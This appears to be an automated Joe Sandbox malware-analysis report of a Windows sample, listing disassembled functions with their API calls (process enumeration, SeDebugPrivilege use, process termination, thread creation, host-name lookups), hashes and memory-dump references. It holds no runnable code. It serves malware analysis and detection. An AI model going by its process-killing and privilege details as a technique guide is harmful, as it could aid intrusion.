                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00131449,?,?,00000000), ref: 00131830
                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00131449,?,?,00000000), ref: 00131833
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00131449,?,?,00000000), ref: 00131843
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00131449,00000000,?,00131449,?,?,00000000), ref: 0013184B
                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00131449,?,?,00000000), ref: 0013184E
                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00131874,00000000,00000000,00000000), ref: 00131868
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1957940570-0
                                                                                                                                                                                                                                          • Opcode ID: 291d6dde5103f7571d19a76cadfad25066bdb6007f169e01912ffd76c5c151ea
                                                                                                                                                                                                                                          • Instruction ID: d5d7e1b10a902494b7c3b46787e592d927b4da619c2a5cf844c1b7f0203f5690
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 291d6dde5103f7571d19a76cadfad25066bdb6007f169e01912ffd76c5c151ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0601BBB5240348FFE710ABA5DC4DF6B3BACEB8AB11F004411FA45DB6A1CAB19840CB70
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0013D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0013D501
                                                                                                                                                                                                                                            • Part of subcall function 0013D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0013D50F
                                                                                                                                                                                                                                            • Part of subcall function 0013D4DC: CloseHandle.KERNEL32(00000000), ref: 0013D5DC
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0015A16D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0015A180
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0015A1B3
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0015A268
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 0015A273
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0015A2C4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                          • Opcode ID: a00f668fe0df9402063842f10b4eb6eb38fa7485c1347195fc2f494e2b3d9565
                                                                                                                                                                                                                                          • Instruction ID: 70d9395d81cc1f2f3363b66c6f03f7ecc77b3625bf26d7057b8b6294721b8087
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a00f668fe0df9402063842f10b4eb6eb38fa7485c1347195fc2f494e2b3d9565
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD61AD30204242EFD710DF18C895F65BBA1AF44318F54859CE86A8FBA3C772EC49CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00163886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00163925
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0016393A
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00163954
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00163999
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 001639C6
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001639F4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                          • String ID: SysListView32
                                                                                                                                                                                                                                          • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                          • Opcode ID: f3aa56bae18341e93ea017c356cef9a18f8aa4e0b97cbcbaf1d83ccff895a146
                                                                                                                                                                                                                                          • Instruction ID: 346d5a956977c19315918f73c542d5921931c0d54934dfed39e78344afbb988d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3aa56bae18341e93ea017c356cef9a18f8aa4e0b97cbcbaf1d83ccff895a146
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9741A571A00319ABEF219F64CC49FEA7BA9FF08354F100526F968E7281D7B19D90CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0013BCFD
                                                                                                                                                                                                                                          • IsMenu.USER32(00000000), ref: 0013BD1D
                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0013BD53
                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(01095478), ref: 0013BDA4
                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(01095478,?,00000001,00000030), ref: 0013BDCC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                          • String ID: 0$2
                                                                                                                                                                                                                                          • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                          • Opcode ID: 9fec33cbcc1d5d568aba5c3185324b8f35468205284c0c76fafe607ea6f552b5
                                                                                                                                                                                                                                          • Instruction ID: a7a3495115851a71122f428c4d7240b02588e24d699253c9c118f6c0b2b9e65e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fec33cbcc1d5d568aba5c3185324b8f35468205284c0c76fafe607ea6f552b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51C070A082099BDF20DFE8D8C4BAEBBF4BF55318F144229E645E7291F7709945CB61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0013C913
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: IconLoad
                                                                                                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                          • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                          • Opcode ID: d4779bc0f36f037564cf41ef7df4a8ddbe485bf7f46121139ada1b2cc458fc24
                                                                                                                                                                                                                                          • Instruction ID: aa95ab1e4fe2b1b2990519d9bbcb83440b8c04fff142435676d893008e5085c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4779bc0f36f037564cf41ef7df4a8ddbe485bf7f46121139ada1b2cc458fc24
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B11EB3268930ABAEB099B549C83DEB779CDF15358F11006EF900B6182D7A06F4063E5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013DE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                                                                                                          • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                          • Opcode ID: 66ea1f788bad01c62b76b536744169bfb25110d22363550e12a0d6db15877768
                                                                                                                                                                                                                                          • Instruction ID: 62d5c678470516d1e7943ef66fc30ec50be7ea1e2b8f376169ccff73fd63666c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66ea1f788bad01c62b76b536744169bfb25110d22363550e12a0d6db15877768
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82112C31904119AFCB247B24FC0ADFF7BACDF11711F05017AF54596092EFB19A819A90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00169F86 Relevance: 12.3, APIs: 8, Instructions: 260windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00169FC7
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 00169FE7
                                                                                                                                                                                                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0016A224
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0016A242
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0016A263
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 0016A282
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0016A2A7
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0016A2CA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1211466189-0
                                                                                                                                                                                                                                          • Opcode ID: 616179477dc1d2fb42df8c07c4fdc818c71bdc675c78eb32a40992656951ab3b
                                                                                                                                                                                                                                          • Instruction ID: 9aad950e8874390955d643aa4f46ae7ba19f8018d68bc06db7124bf6e667361b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 616179477dc1d2fb42df8c07c4fdc818c71bdc675c78eb32a40992656951ab3b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BB1B731600215ABCF14CF68CD947AE3BB2FF45701F098069EC89AB299D731A9A0CF61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 952045576-0
                                                                                                                                                                                                                                          • Opcode ID: 442d30f147eb5f90922b4d5d42d467970a14679e67dbfbfc7020c893f4841069
                                                                                                                                                                                                                                          • Instruction ID: 90cb3801d45697d2d20116a7bef723d58e34463064ef3badebd3dcd0a599cdd3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 442d30f147eb5f90922b4d5d42d467970a14679e67dbfbfc7020c893f4841069
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C541D065D1021C76CB51EBF48C8A9EFB7A8AF45700F408466FA18E3562FB34E245C3E6
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000EF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0012682C,00000004,00000000,00000000), ref: 000EF953
                                                                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0012682C,00000004,00000000,00000000), ref: 0012F3D1
                                                                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0012682C,00000004,00000000,00000000), ref: 0012F454
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                                                                          • Opcode ID: 86df18a5f2d355d29762d974cbd76a1073ec0dc2449c64d3fee231ccc433913a
                                                                                                                                                                                                                                          • Instruction ID: 15a7c7c1de4ffc21bd8aa77db0b7997acb8e7dd06447fbc6c7406896d5af1b84
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86df18a5f2d355d29762d974cbd76a1073ec0dc2449c64d3fee231ccc433913a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E4127312086C1BEC7789B2ADC8877A7BE2AB56314F15443DE0C7B6962C7B1A8C1CB51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00162D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00162D1B
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00162D23
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00162D2E
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00162D3A
                                                                                                                                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00162D76
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00162D87
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00165A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00162DC2
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00162DE1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                                                                                          • Opcode ID: 77d788c0cec844aeb51873a56b50cc875812dd3453fb01170bcaab5de0279344
                                                                                                                                                                                                                                          • Instruction ID: fa39a05ea8bc9f966681ccf32ca3803d2bf4033f9de9e12e232fa83d47e497d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77d788c0cec844aeb51873a56b50cc875812dd3453fb01170bcaab5de0279344
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD317A76201614BFEB218F50CC8AFFB3BADEF09715F044055FE489A291C6B59C90CBA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00135622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2931989736-0
                                                                                                                                                                                                                                          • Opcode ID: e37b9c073c48733e78b5624f01b4e4ed4fe9ebe7068bb4de6fc3173fedd3d185
                                                                                                                                                                                                                                          • Instruction ID: cc6370cb724b2edd9210de8b009c6f36e20137531a68e046c477142a25232488
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e37b9c073c48733e78b5624f01b4e4ed4fe9ebe7068bb4de6fc3173fedd3d185
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8321A7F1644A09B7D71855209D83FFA335FAF20B94F850024FE059A982F760EE21D1E5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00154FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
